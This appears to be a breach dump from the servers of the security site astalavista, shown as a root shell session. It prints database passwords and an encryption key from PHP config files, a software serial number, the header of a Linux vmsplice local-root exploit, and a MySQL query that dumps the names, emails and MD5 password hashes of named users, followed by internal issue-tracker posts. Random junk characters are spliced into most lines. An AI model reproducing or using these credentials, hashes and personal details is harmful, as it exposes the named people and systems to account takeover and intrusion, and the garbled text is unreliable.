drwx–x–x  6 astanet astanet 4096 Jun  4 09:51 .' s1 M! Y+ E- s# h6 E) o
drwxr-xr-x 14 root    root    4096 Mar 11 17:56 ..* F6 P% `9 A0 M0 l( S
drwxr-xr-x  2 root    root    4096 Dec 23 16:00 auth; r9 F) }9 @4 `+ @" L# ?5 Y
-rw——-  1 astanet astanet 3892 Apr 16 12:14 .bash_history: ]: R' N/ W4 c$ Z5 E2 C, Q
-rw-r–r–  1 astanet astanet   33 Dec 17 21:50 .bash_logout
% s- N: N2 T) y: b4 M" O, ~-rw-r–r–  1 astanet astanet  176 Dec 17 21:50 .bash_profile
5 v8 b8 L3 T/ s/ C$ _-rw-r–r–  1 astanet astanet  124 Dec 17 21:50 .bashrc
) p7 Y' c3 W- K( C) {: Hdrwx–x–x  3 astanet astanet 4096 Dec 23 12:18 domains
7 B/ J3 W3 u. B3 W9 Zdrwxrwx—  3 astanet mail    4096 Dec 23 12:18 imap
+ V9 }8 g- V4 ]drwx——  2 astanet astanet 4096 Dec 23 12:18 mail/ }$ _2 _+ E9 Z  i+ D  k" E
-rw——-  1 astanet astanet  197 Jun  4 09:51 .mysql_history
9 s9 m' W; v5 j1 o5 a) y  Slrwxrwxrwx  1 astanet astanet   37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
+ g' N$ r8 c0 g( l/ T; C-rw-r—–  1 astanet mail      34 Dec 22 12:41 .shadow4 n$ r+ C* {; E8 K7 a

) d7 t  G. H8 \! Z; msh-3.2# cd auth/
' E2 Q  B. N" Gsh-3.2# ls -la
8 C2 f7 F3 h9 f2 e+ w2 stotal 28$ |7 g6 M$ l4 G6 ^, [: j
drwxr-xr-x 2 root    root    4096 Dec 23 16:00 .6 [) a3 C) i1 C" l, I& h' i
drwx–x–x 6 astanet astanet 4096 Jun  4 09:51 ..2 I8 k! \: b1 J4 o, p7 m. q1 ]
-rw-r–r– 1 root    root     321 Jan  5  2006 hackercontest.config.inc.php2 U$ }: I! H# t
-rw-r–r– 1 root    root     319 Jan  5  2006 hosting.config.inc.php
: M$ ]& J* h. Q-rw-r–r– 1 root    root      24 Jun  4 09:38 .htadm_pwd  Z4 a% Z0 S# S" U* X
-rw-r–r– 1 root    root      49 Jan  5  2006 .htpasswd_newhosting
9 k! `  N2 d. B8 ]-rw-r–r– 1 root    root      51 Oct 11  2006 .htwebalizer_pwd
/ {5 N" {8 L1 B0 c: i; {% u' [
" I5 B2 h$ o9 E$ j6 xsh-3.2# cat hackercontest.config.inc.php' t* }* K' u1 \2 M2 p
<?PHP
: b3 s: b! j$ ~1 R  B// Variabeln f?r Verbindung zur Datenbank //+ M8 C# M4 d; J! A! O
$conxHost = ‘localhost’;                       // MySQL hostname6 Q* y3 B$ t/ p  T
$conxUser = ‘hackercontest’;                                       // MySQL user* j- |8 V% s3 l, S% ^+ A
$conxPassword = ‘K6m@7dUc’;                    // MySQL password- X+ |! l, K7 H/ w7 l5 H
$bfkey = ‘cXvB3981′;                                       // Encryption/Decryption Key for Blowfish: N' z: K, h8 H8 r
?>
4 c7 ~' L- q2 a5 n2 qsh-3.2# cat hosting.config.inc.php: e+ e* p, c- Z! @3 ?7 }+ D
<?PHP
; C( c& d* Z! l! e# n// Variabeln f?r Verbindung zur Datenbank //+ x# E6 D+ S5 h* C) y' Y# ~- ~9 Z
$conxHost = ‘localhost’;                       // MySQL hostname, ^$ @% g& x7 |- x  P6 x  f/ I
$conxUser = ‘hostinguser’;                                 // MySQL user
0 t- Y( _! q1 m7 R- Z6 k% {$conxPassword = ‘cXvB3981′;                    // MySQL password( Q; @" S, k8 G
$bfkey = ‘cXvB3981′;                                       // Encryption/Decryption Key for Blowfish
8 n! X" j1 g$ R?>
3 B. q0 P1 P" E
9 h2 y3 B: O' ^. }  A3 P$ qsh-3.2# cd ..6 \$ b. O' M; _
sh-3.2# cd com9 P& }* w" c2 c* C
sh-3.2# ls -la
, D; t$ h) C" C. i6 U( y$ @total 1412088 s; M9 n: Y5 N2 u2 X! |# P
drwx–x–x 10 com  com       4096 Apr 28 12:40 .
1 U5 {$ t, G+ u6 c  U$ l: tdrwxr-xr-x 14 root root      4096 Mar 11 17:56 .., K2 Z% [( P+ G2 |8 H+ E8 x
drwx——  2 com  com       4096 Jun  4 04:04 backups! ?0 @, r5 M  p( {4 u! H' W6 v  W
-rw-r–r–  1 root root   2419504 Sep 28  2007 backup.sql
9 Q% r! N7 G7 A, O( i2 Udrwxr-xr-x  2 com  com       4096 May 12 15:20 backup_system
; l8 {. ~! Z% @* H, p9 S* ]" g-rw——-  1 com  com      21880 Jun  2 08:07 .bash_history
, \  {$ D, N  l# z- `4 B; a( _-rw-r–r–  1 com  com         24 Sep 24  2007 .bash_logout. j9 O$ z+ B* i1 r- C4 z
-rw-r–r–  1 com  com        176 Sep 24  2007 .bash_profile
8 N& ^6 c; u  |3 ?-rw-r–r–  1 com  com        124 Sep 24  2007 .bashrc  \$ }3 T( k$ \# U
drwx–x–x  3 com  com       4096 Jan 29  2008 domains
& q, w* y' N. F-rw-r–r–  1 com  com      16409 Jul 16  2008 FWUser.class.php.fixed0 d! Y% ~3 R6 @- T$ l/ i+ b
drwxrwx—  3 com  mail      4096 Jan  6 19:24 imap" |& P3 z9 g2 B* R' p
-rw——-  1 com  com         69 Nov 18  2008 .lesshst
9 j- s2 Z7 Q  _( C7 {drwx——  2 com  com       4096 Sep 24  2007 mail# w2 r/ F! h: Q. G- h- o: e
-rw——-  1 com  com      13970 Mar 28 21:42 .mysql_history! p, ~# k" M3 T8 |' b/ y! O
drwxr-xr-x  2 com  com       4096 Aug 20  2008 .ncftp
( I/ U8 O; v5 I1 a/ A$ S. Plrwxrwxrwx  1 com  com         37 Sep 24  2007 public_html -> ./domains/astalavista.com/public_html" [. R5 P7 W% ?5 Q9 \) p
-rw-r—–  1 com  mail        34 Sep 24  2007 .shadow4 t; h- @- v/ C3 e. @2 D$ d4 t
drwx——  2 com  com       4096 Aug 26  2008 .ssh( r- P5 o0 r! o( E$ ^9 p
-rwx——  1 com  com       8515 Feb 10  2008 t. d2 V* V# Z; F4 P7 n( o
-rw-rw-r–  1 com  com       6265 Feb 11  2008 t.c
& ^! O$ E/ f/ h: N3 q0 f3 U( Xdrwxrwxr-x  2 com  com       4096 Jan 30 15:47 tmp
2 O. H% _+ q0 v% ]/ ]% ^! D6 J  s-rw-rw-r–  1 com  com        617 May 20  2008 .toprc
3 D/ r) r" J8 O+ ]2 @( r-rw-rw-r–  1 com  com  141851766 May 19  2008 version2-backup-20080519-0900.sql
" X3 p, I1 x3 ~! B: n# @-rw——-  1 com  com      16629 Mar 28 21:46 .viminfo
6 N7 h# M! d( O0 t- R4 w. t2 r; z) t9 @-rw-rw-r–  1 com  com         51 Aug 25  2008 .vimrc
; y& ^1 E. @- g; g
1 ]3 e1 f2 b, X) Ush-3.2# head t.c* }- R! U8 d0 d8 `; w( Y8 a
/*% D! m  ^  Q+ K' M" o% Q( m! x* k
* jessica_biel_naked_in_my_bed.c
0 N. ^* U7 ~6 L*
* X& z2 e9 t0 h5 L5 P) P& q* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
9 o$ m5 Q, Y/ S; Z# X) @: f9 x* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.. W2 H( W& J6 U" @8 N, m' f
* Stejnak je to stare jak cyp a aj jakesyk rozbite.* M3 V' ?9 ~0 S. R4 c2 E
*
) p5 |* ]7 E; M* Linux vmsplice Local Root Exploit- t- |4 I! K9 A
* By qaaz
* r; ]* T, [( Q*
0 i. X+ t/ f3 N; ~1 O+ r2 m4 n
3 O2 ~9 {" m3 F! ^sh-3.2# cd /$ c( t- T! M7 [
sh-3.2# ls -la2 r6 Z  W# |4 m7 I8 l+ T4 L
total 360
, ~, `* D; r% U5 X, ]drwxr-xr-x  25 root root   4096 Jun  3 02:43 .. t) B4 n) O# l4 h- H2 D! K
drwxr-xr-x  25 root root   4096 Jun  3 02:43 ..; @$ O. A# _" v$ @& V* J3 |: K: \, {4 {
-rw——-   1 root root  10240 Jun  3 02:39 aquota.group
- v: c  H( Z9 p% a, a% t  W-rw——-   1 root root  10240 Jun  3 02:39 aquota.user* V& c2 t1 z8 Y+ {
-rw-r—–   1 root root    819 Jul 17  2008 astalavista.us.db) [6 \  w/ Z2 G1 S! e) G
-rw-r–r–   1 root root      0 Jun  3 02:43 .autofsck4 N" ?/ e4 D. ~5 X# w# Y  c2 \, V
-rw-r–r–   1 root root      0 Sep 16  2007 .autorelabel& y3 v9 s% D: G
drwxr-xr-x   3 root root   4096 Dec 29  2007 backup/ e) U, H: o" C" a, q
drwxr-xr-x   2 root root   4096 Jun  4 04:03 bin; S9 G& U4 R! c
drwxr-xr-x   5 root root   4096 Jun  2 14:06 boot
0 o. Q7 L& ~. R0 t0 U& J' T$ zdrwxr-xr-x  11 root root   3620 Jun  3 02:43 dev
5 H4 B: y, I2 }) c4 Zdrwxr-xr-x  84 root root  12288 Jun  4 03:16 etc' ]1 D& z) K2 g4 `# N( e( E
drwxr-xr-x  14 root root   4096 Mar 11 17:56 home
1 G/ \$ c, D& J5 O' \3 U-rw-r–r–   1 root root  13387 Mar 20  2008 httpd.conf& C9 ^/ B" N8 Q
drwxr-xr-x  11 root root   4096 Jun  4 04:02 lib' x1 v! d2 O" \' U' k1 ^& p" G
drwxr-xr-x   7 root root   4096 Jun  4 04:03 lib64; j( Q% s6 @  I& o
drwx——   2 root root  16384 Sep 11  2007 lost+found
. h; Y$ {4 B$ [& L/ I0 `drwxr-xr-x   2 root root   4096 Mar 11 17:56 media
+ ^+ Z9 t* R4 C3 odrwxr-xr-x   2 root root      0 Jun  3 02:43 misc: g- s  j# L2 X$ s
drwxr-xr-x   2 root root   4096 Mar 11 17:56 mnt
) \0 R  S2 l8 k/ w& ~6 u# j-rw-r–r–   1 root root   5859 Feb  3  2008 mrtg.cfg$ x5 v9 u. I" Y9 \# h/ u: j
drwxr-xr-x   2 root root      0 Jun  3 02:43 net
# V: o6 W: Z+ x7 _1 }  n) }4 Q5 Fdrwxr-xr-x   3 root root   4096 Mar 11 17:56 opt
8 \2 K$ s. |9 O4 fdr-xr-xr-x 264 root root      0 Jun  3 02:42 proc
% A3 o- J' u+ V& X1 wdrwxr-x—  15 root root   4096 Jun  4 08:40 root
4 H2 z7 ~3 v# s) O7 g/ kdrwxr-xr-x   2 root root  12288 Jun  4 04:03 sbin
8 u2 w6 R8 C4 I, t0 F0 }drwxr-xr-x   2 root root   4096 Mar 11 17:56 selinux& W4 F7 R  B# w% ~8 D8 u, x: j
drwxr-xr-x   2 root root   4096 Mar 11 17:56 srv  d2 d& c5 B! b
drwxr-xr-x  11 root root      0 Jun  3 02:42 sys0 C+ b2 l% s  K
drwxrwxrwt   4 root root 122880 Jun  4 10:35 tmp
/ }' {4 k# d* S* Tdrwxr-xr-x  16 root root   4096 Jun  2 13:56 usr
4 ]' z) n; d0 d) U  B' @  h: Fdrwxr-xr-x  26 root root   4096 Jun  4 03:16 var& ~( Z' ]1 f/ B) M) V. A

$ L! p- w5 y+ P- ^& ]5 P$ ash-3.2# cd opt
; W2 Z0 }" x3 W! I' J$ T# Msh-3.2# ls -la" W% R& D( j; c2 G7 ^. C
total 20
4 Y/ o* S: ~- ]. }1 e8 L8 W0 J" Sdrwxr-xr-x  3 root root 4096 Mar 11 17:56 .
1 \9 t9 N# h( _9 [drwxr-xr-x 25 root root 4096 Jun  3 02:43 ..1 F8 m6 z8 n, h5 \
drwxr-xr-x 15 root root 4096 Mar 20  2008 lsws
$ g2 C( G; s% _# a. i& [8 e" d& @9 l! x$ x" o) b/ w/ n; J: }
sh-3.2# cd lsws/
( N  s5 o, q$ |- ]) Ysh-3.2# ls -la# s& q1 R7 P- b  b( ~' E: _
total 108; e8 C6 L+ i! V9 F
drwxr-xr-x 15 root   root    4096 Mar 20  2008 .
% S4 ?: i; x  j' R  h; kdrwxr-xr-x  3 root   root    4096 Mar 11 17:56 ..
7 D- w3 K( ^+ h) N9 t: r  X8 udrwxr-xr-x  8 root   root    4096 Mar 20  2008 add-ons
' S+ I% q: X2 g  L# B6 odrwxr-xr-x 13 root   root    4096 May 29 15:10 admin
' c) R! r- U9 D* q5 K+ q" Y6 E# `drwxr-xr-x  5 apache apache  4096 May 29 15:10 autoupdate8 q5 }; m) [8 I1 Q7 u3 h6 P2 A4 v: h
drwxr-xr-x  2 root   root    4096 May 29 15:10 bin
* S, x4 e0 P, I* I' m8 edrwx——  4 apache apache  4096 Jun  3 02:43 conf$ A- K7 ~# c3 j
drwxr-xr-x  7 apache apache  4096 Mar 20  2008 DEFAULT
3 E5 D7 D  ^! N2 T' Gdrwxr-xr-x  2 root   root    4096 Sep 15  2008 docs
2 c, B  H+ Z% C3 N% T6 v8 W4 d9 ~drwxr-xr-x  2 root   root    4096 May 29 15:10 fcgi-bin# a; I% l9 G2 X
drwxr-xr-x  2 root   root    4096 Sep 15  2008 lib! K* O6 V- r) N% ~$ O" u% {
-rw-r–r–  1 root   root    6959 May 29 15:10 LICENSE
' Y% ]/ r9 J. A-rw-r–r–  1 root   root    2214 May 29 15:10 LICENSE.OpenLDAP
6 |, P8 G# G3 j. `: ~9 s: N  \-rw-r–r–  1 root   root    6279 May 29 15:10 LICENSE.OpenSSL0 I" k& m7 C" U' y" T! P
-rw-r–r–  1 root   root    3208 May 29 15:10 LICENSE.PHP/ G3 W6 V% W7 Z; E* a" x9 u- m/ d* T
drwxr-xr-x  2 root   root   20480 Jun  4 09:55 logs
1 A1 w9 N. G, c% {) w7 Udrwxr-xr-x  2 root   root    4096 Mar 20  2008 php
6 }/ h( g0 d1 W5 r2 W5 |9 Jdrwx——  2 apache apache  4096 Mar 20  2008 phpbuild
* W8 Z, L$ l3 I& p7 y+ Gdrwxr-xr-x  3 root   root    4096 Mar 20  2008 share% V" r  f! ?, q* ~$ O% A
-rw-r–r–  1 root   root       6 May 29 15:10 VERSION- F6 I# a7 r5 b; [/ n& a! Y# a7 d

( A$ N6 I0 L: C6 bsh-3.2# cd conf6 [0 e" q) g; Q  G7 m' q3 |( L
sh-3.2# ls -la
) g  b1 E6 q7 y# R6 f; N" R: Mtotal 48- ?: d" w; C8 f, P3 `) t* V, T
drwx——  4 apache apache 4096 Jun  3 02:43 .9 |' Q% D; k: [& q
drwxr-xr-x 15 root   root   4096 Mar 20  2008 ..
( h% _; k( I5 w5 {( C4 H( x' Zdrwx——  2 apache apache 4096 Mar 20  2008 cert
- y7 s$ S2 E3 ~-rw-r–r–  1 apache apache 6668 May 29 15:13 httpd_config.xml# ^1 @5 o+ F, r* L; U, N
-rw——-  1 apache apache 6613 May 27 18:33 httpd_config.xml.bak
( B8 V/ s; D& e" L% w) a( [-rw-r–r–  1 root   apache    0 Jun  3 14:11 .last
, W/ g# F: k6 O) G-rw——-  1 apache apache  256 May 29 15:10 license.key
/ j! D' I( p% F/ f0 J9 z$ H# l, ]% y-rw——-  1 apache apache  256 Mar 21  2008 license.key.old: F0 E% W# i( z. t. S; M% j3 q$ K7 j
-rw——-  1 apache apache 3320 Mar 20  2008 mime.properties2 \) w; R7 E# h
-rw——-  1 apache apache   20 May 29 15:10 serial.no8 v% k- f3 a& L$ E- Q) H6 _' ~
drwx——  2 apache apache 4096 Mar 20  2008 templates
/ r! m, F% P- F& h& P6 ^: p, A- A- B  C3 F6 l$ ?
sh-3.2# cat serial.no
: D! I6 ~4 c  u3 v9 q/ Z; i. vIbDl-oVsO-CKqL-wVRa
; U: M2 z1 d+ Z# I+ M& C
. K5 Q1 c' l( u. B# _/ Esh-3.2# mysql1 \+ q: `# n9 P2 j) z6 F" C% u$ M
Welcome to the MySQL monitor.  Commands end with ; or \g.; Y8 [% E2 C( x4 I+ [; a
Your MySQL connection id is 286844
. |+ E- D- H0 ~' g+ `Server version: 5.0.45-community-log MySQL Community Edition (GPL), W/ E0 P& L3 b$ o

- M; B) D0 N, M: w! oType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
  K0 @4 V/ x. C6 M! `! J% R' @' v, ~$ E3 Z1 G# m& O
mysql> show databases;
0 _/ q1 i4 x* x0 ?" I7 F5 i+———————–+
8 Y. p. }! w$ G, r, z3 g1 G| Database              |, }' x3 Q0 r' U' j$ n3 C
+———————–+& M, r+ R! ]$ s* B9 }& i3 t2 `
| information_schema    |
! z3 N+ X0 P9 Y| astanet_ads           |4 r6 n2 a. b) ^9 R; d9 c* q' U
| astanet_mailing_lists |
, a' Z7 ?# Y. `' E/ t" E' || astanet_mediawiki     |
. r3 A/ o  }8 y5 z) n1 t/ S" o| astanet_membersystem  |  m! ^# g! r/ ?6 t
| com_contrexx          |, d$ ?6 j& M2 W# Y- S3 g7 L4 W
| com_contrexx2         |
2 G, ^3 ]7 m3 A3 z" G; n. w" ^& A| com_contrexx2_live    |
  S2 Q. h; O6 {1 F| da_roundcube          |
6 J4 b# v; E: O) J| dolphin               |
! F5 G: b) \2 H9 }3 _# _$ P# G* i| ideapool              |4 r% N0 M) s9 w, ?7 {, X' D
| mysql                 |
* ~3 \; q" t% O% f' J0 D| test                  |
( v$ W% n( b& a! l| yourmaster            |# a! j% K4 ^+ ?" C  ~9 D2 D
+———————–+
& S: V% {4 e# t8 z, B3 i14 rows in set (0.00 sec)
' d+ W0 S9 ~: Y1 _1 t- X4 K9 l
  F: _% \, Q3 A# r  P* Smysql> use ideapool# |+ e* h! j/ p1 r! o% X
Database changed# }" D- @" M% Y5 [9 P, S
mysql> show tables;
; d7 H% a: N/ k& G( p+ A1 Z+———————————–+
2 B" a' g: l- G1 n: b% X| Tables_in_ideapool                |
) `! Z6 t5 ^8 l- f# |0 b. Y$ u2 s+———————————–+
/ O# v$ B! q$ Q2 X  U4 M' E| eventum_columns_to_display        |
' c- u' P) ?- P0 ^# m+ g6 k| eventum_custom_field              |2 L2 ^3 u! L& W5 O
| eventum_custom_field_option       |# _8 e9 V. q9 ]! ^/ I$ v* J4 s
| eventum_custom_filter             |
! X4 U$ ^# c. Y: J. r| eventum_customer_account_manager  |8 }* t4 n9 C- f$ h
| eventum_customer_note             |  U  w% S$ }# t4 G) C, D
| eventum_email_account             |
) D: J3 j; X3 I6 Z| eventum_email_draft               |& H9 k% T; }, T1 b; ~6 d
| eventum_email_draft_recipient     |
# f6 e( x, [+ w: m& }4 }2 E  w| eventum_email_response            |
8 n5 @2 k3 H# V2 f% \- y3 n* O$ C( Q| eventum_faq                       |
- S3 \+ |+ x% ]- U. x| eventum_faq_support_level         |8 D6 U5 g- N5 M$ d' c  Q/ K- u" H
| eventum_group                     |
( [0 E' \, y1 N+ K6 g' o; V& b4 v| eventum_history_type              |
+ }9 v1 E' J# m" X| eventum_irc_notice                |. g1 J8 c( V4 p7 M9 \3 F6 k
| eventum_issue                     |
) P- Z: P. [8 V2 W: v- ~| eventum_issue_association         |
. u8 d) G# `# M| eventum_issue_attachment          |. |: |  G. F- S" S$ N- O+ e0 Y
| eventum_issue_attachment_file     |
2 H) T/ l7 {& y/ B2 a  q| eventum_issue_checkin             |
, N7 d$ r) t/ v% w8 s( Q% X! h| eventum_issue_custom_field        |
1 w5 M& ^% z+ G" || eventum_issue_history             |
' p6 u/ z& a3 `# [/ R( ?: `" l2 O| eventum_issue_quarantine          |- H, g$ d+ ]( D) u% C4 Y& Q0 `- ^
| eventum_issue_requirement         |
3 a8 y# f- P+ R3 r) Z4 d4 u2 O| eventum_issue_user                |
& m. w  F* |: X$ @) X5 q& |1 p| eventum_issue_user_replier        |
" k* s; [& x' [: u) ?6 s/ J2 t- K| eventum_link_filter               |! T5 O# f9 N4 @% |+ O/ |
| eventum_mail_queue                |. g3 u% r7 s! L
| eventum_mail_queue_log            |- G) ~0 U" l3 l7 J3 a
| eventum_news                      |
! A+ v2 Z8 B: U| eventum_note                      |) ]& t4 ]3 }% x0 m
| eventum_phone_support             |
: F$ X$ V0 w0 X3 T8 k) L| eventum_project                   |0 o" ~# j" p6 ?8 ^: Y
| eventum_project_category          |
9 t, h' n$ i% \6 m5 \| eventum_project_custom_field      |
2 _6 l# Q3 y& T. \1 S| eventum_project_email_response    |
7 N; N; k) P2 q9 ?1 \| eventum_project_field_display     |
+ b' ~- [  E) Y  I$ B| eventum_project_group             |
9 K- ?; {2 X& }+ q| eventum_project_link_filter       |. j/ z2 T& M6 F1 b
| eventum_project_news              |1 c) s, m# t) }4 N
| eventum_project_phone_category    |2 ^# ^" _7 w- f. p
| eventum_project_priority          |" w; x! Z  B) E
| eventum_project_release           |
; `! C" T1 v4 _+ P) r+ Y, N6 || eventum_project_round_robin       |
( {9 ~. m$ z3 L0 Y' w* D. k| eventum_project_status            |
* P7 Z  n8 o$ e- m0 m# U6 |2 X| eventum_project_status_date       |
' Q1 P" _+ N2 g* n| eventum_project_user              |4 \) A: A# u" `! u2 ]4 [
| eventum_reminder_action           |# D, Y+ g+ S( X
| eventum_reminder_action_list      |
4 x  f8 {) c7 e3 V| eventum_reminder_action_type      |" V6 b4 X% {$ B: ^+ }
| eventum_reminder_field            |
. R# z) W& C" F/ a; m% @+ c' v+ e| eventum_reminder_history          |
2 \7 b4 j" M; s' Q& C, Q| eventum_reminder_level            |
3 r, l' g7 B; L% o0 B8 r+ x$ ^* z| eventum_reminder_level_condition  |
7 x% W, i7 Q& H7 ~6 K$ s) f| eventum_reminder_operator         |
. Z) a& K- P( K( I! Y| eventum_reminder_priority         |
0 [) O# d9 [" P9 o5 L( {  t. U4 R, r| eventum_reminder_requirement      |
. K9 X. `- K7 ?* h6 \, r' o| eventum_reminder_triggered_action |9 V1 @( W! C+ f8 v
| eventum_resolution                |
9 e: Q  D8 \8 m; z7 b2 v/ }5 R; s| eventum_round_robin_user          |2 H5 M& w6 u" {3 J2 a
| eventum_search_profile            |' D) ^' f9 K8 r" V/ n
| eventum_status                    |) u# C  q2 N3 S5 Q- _& A+ ?+ B
| eventum_subscription              |
3 c8 W4 L& r8 G4 @- h/ i| eventum_subscription_type         |
) V- i- g. O$ T8 W) P| eventum_support_email             |
  W8 s. t' {; q5 ~! w| eventum_support_email_body        |
# P) r; P; U( Q5 f4 [| eventum_time_tracking             |# H* t- `  F% Z  _& B/ @
| eventum_time_tracking_category    |
- ~! o" }+ J5 C2 V2 N| eventum_user                      |
: {2 l( A  n. p+ U+ e  N! X+———————————–+3 j: }* g# b# g: U7 n3 O& E
69 rows in set (0.00 sec)
' r  _; I3 ~2 S) t' m& R% n+ v% u* c; [
mysql> describe eventum_user;$ e5 L: y# i) A; d3 v
+————————-+——————+——+—–+———————+—————-+3 q7 A! [, T0 S$ s) Q; X
| Field                   | Type             | Null | Key | Default             | Extra          |
8 B5 y! O/ u8 J) p' Q5 m( ^) ?5 t+————————-+——————+——+—–+———————+—————-+1 H7 E+ ^- a; R# J5 z& B
| usr_id                  | int(11) unsigned | NO   | PRI | NULL                | auto_increment |+ J2 \. x( l- A5 ?0 L
| usr_grp_id              | int(11) unsigned | YES  | MUL | NULL                |                |
1 Q9 ^0 r% }5 J% q| usr_customer_id         | int(11) unsigned | YES  |     | NULL                |                |) Z' G& p2 G% }+ ~8 m
| usr_customer_contact_id | int(11) unsigned | YES  |     | NULL                |                |
0 H% K5 ~5 x/ L4 @4 g& K: M| usr_created_date        | datetime         | NO   |     | 0000-00-00 00:00:00 |                |
, C. [: d" r" G  R% f| usr_status              | varchar(8)       | NO   |     | active              |                |: O' h5 @# }" Q3 V: N4 P& q  S
| usr_password            | varchar(32)      | NO   |     |                     |                |" i  J+ A6 U6 k% s: x
| usr_full_name           | varchar(255)     | NO   |     |                     |                |
: H$ I3 e0 A. c4 r/ D8 w| usr_email               | varchar(255)     | NO   | UNI |                     |                |
9 P& T3 t- l3 t& ^$ g5 r| usr_preferences         | longtext         | YES  |     | NULL                |                |
4 s7 E. A; k( t, ?  U3 w, A| usr_sms_email           | varchar(255)     | YES  |     | NULL                |                |
: q$ Q/ j8 q9 B, U  r2 `| usr_clocked_in          | tinyint(1)       | YES  |     | 0                   |                |
, F9 p1 ?* ?0 O, g+ \| usr_lang                | varchar(5)       | YES  |     | NULL                |                |
# _4 _5 @; [: A& L& H! C+————————-+——————+——+—–+———————+—————-+
+ J7 S4 |8 j6 }$ M; A  q% X13 rows in set (0.00 sec)
  H5 s0 }% N) Y* K8 w& }& H/ m! V1 }! W/ d+ T5 F8 @" `/ W
mysql> select usr_full_name,usr_email,usr_password from eventum_user;" y, W- Z! z! N* |( @
+———————-+——————————-+———————————-+
% z, z7 p% s5 P| usr_full_name        | usr_email                     | usr_password                     |3 N8 v; m6 R/ R
+———————-+——————————-+———————————-+8 \8 I; c! k  r& I5 k
| system               | 链接标记system-account@example.com    | 14589714398751513457adf349173434 |# [" x6 P# S# K5 Z/ U
| Developer (Paulo)    | 链接标记paulo.santos@astalavista.ch   | 26a35a1cf8895c27fb37ef4cf149f7bb |) G/ t1 J8 R6 m, @( |
| Be1er0ph0r           | 链接标记be1er0ph0r@gmx.de             | 229766dc0ca1fb67160a8782321dfdce |6 j, o1 p0 ^4 d2 @
| Admin                | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |
, [1 \. u0 q; q5 c+ M" I| ADMIN                | 链接标记admin@astalavista.ch          | f6fdffe48c908deb0f4c3bd36c032e72 |' ]. u; E. z( T! `4 b; M! |7 |
| USER                 | 链接标记user@astalavista.ch           | 5cc32e366c87c4cb49e4309b75f57d64 |
: l: X9 ?& l4 A; p9 F1 K9 G8 i| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com       | f7735ab119023a8abb2301e67f81cd67 |
1 j6 O; C$ e, n2 Y+ J| Joao                 | 链接标记joao.pontes@astalavista.net   | f805c071d7c823b937448c54c047b9fd |
! g5 }1 Y: O0 P| Pascal               | 链接标记pm@astalavista.ch             | e10adc3949ba59abbe56e057f20f883e |. c( Z) D. y. \0 \4 F4 T/ K# A7 X9 I
| commander            | 链接标记commander@astalavista.com     | 932cd250918f881d41feb0b93883a926 |
9 ^7 t2 e; J; O9 O- r| ishtus               | 链接标记ishtus@astalavista.com        | a587ffc88b3dbbba3fd2fe67af649ff0 |
& r' z' t- f) }( `0 u7 t| sykadul              | 链接标记sykadul@astalavista.com       | 20224a2f3eeb57a13a10b4df543c128e |
- A4 n+ [3 p) E; ~: h5 ?) c| Zach McElroy         | 链接标记admin@badfoo.net              | 33c5d4954da881814420f3ba39772644 |9 w1 J3 C. _  \1 x" x* ]; U
| usb                  | 链接标记usbenigma@hushmail.com        | b513f22c3db6932855ad732f5f8a10a2 |
; g! y. C) |/ u8 H# M; x4 G( K8 Y| cyph3r               | 链接标记cyph3r@astalavista.com        | 6e1e50017a945e874d52ec91f9ab2cee |
/ B" j. X7 O; E+———————-+——————————-+———————————-+5 J2 X5 y8 e8 M1 Q, t3 O1 E
15 rows in set (0.00 sec)
/ D, A, Q  f' A4 p0 \1 t
1 D1 Y/ c! |7 B9 A4 ], ~5 kmysql> select iss_description from eventum_issue where iss_id = 43;( z1 N3 U" f4 r+ M. O1 e3 }! t" H
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+# v8 u' s. F9 g" U5 Y0 A, }
| iss_description                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
3 ?2 j3 q" G/ V8 e* \3 b+ @/ m|
$ N4 A' r9 g9 v+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
5 B- v0 a& M9 x, m| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be, h  v+ `" Z1 }! M, B0 D
connected for 90 mins… 120mins… so what i propose is something like:* M8 C  x9 i+ o* n7 o
链接标记[url]http://www.surfthechannel.com/[/url]1 O8 p8 s4 n6 V
since they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system) a- h6 d; i7 k- ~+ d
like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t
: X  [; g) E4 ]0 s% L0 `break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off! T. C4 m/ Z' o0 ?
if they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…  [5 W2 u. o0 }: a3 o5 z

) I+ j5 A/ m7 V5 g1 o% u7 NWe could also put advertisement during play on the flash video player itself… extra $$…
' t% {( p( l4 i/ p7 V1 T- K5 g1 v8 t' q1 W
By sykadul |1 X& |( R2 b6 F9 y1 ]
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
( N/ d2 R. X$ x1 row in set (0.00 sec)
  {. L& ?5 H) e4 g; E5 g# M% z/ E: o# S% ~
// Money and extra $$ is all they care about. remember that.8 ~2 t0 E6 T( H# R  V& c$ k  D# n
4 d8 ^8 U4 F' u  R0 |
mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;
" z$ L& `: j0 h+————————+——————————————————————————————————————————————————————————————————————————————-+
. E9 w0 f& e! c/ K4 L| iss_summary            | iss_description                                                                                                                                                                                                                          
1 l' Z9 ]2 v' j- d; v|
- F0 E) i( Y4 x, }6 q0 i+————————+——————————————————————————————————————————————————————————————————————————————-+
( Z* K% P# F3 m| Forum for REAL EXPERTS | Hello,
- A( D9 l% y9 i+ h* M4 `$ G% X* `7 @1 z3 z# P
Ishtus and I,
; B' k- L. J, C, x( {# Z; {
, A2 Y/ p8 D6 z) H' c7 `3 I  \! RCame up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide6 g1 n( q# @8 p; B  [) i, W/ }3 G+ w
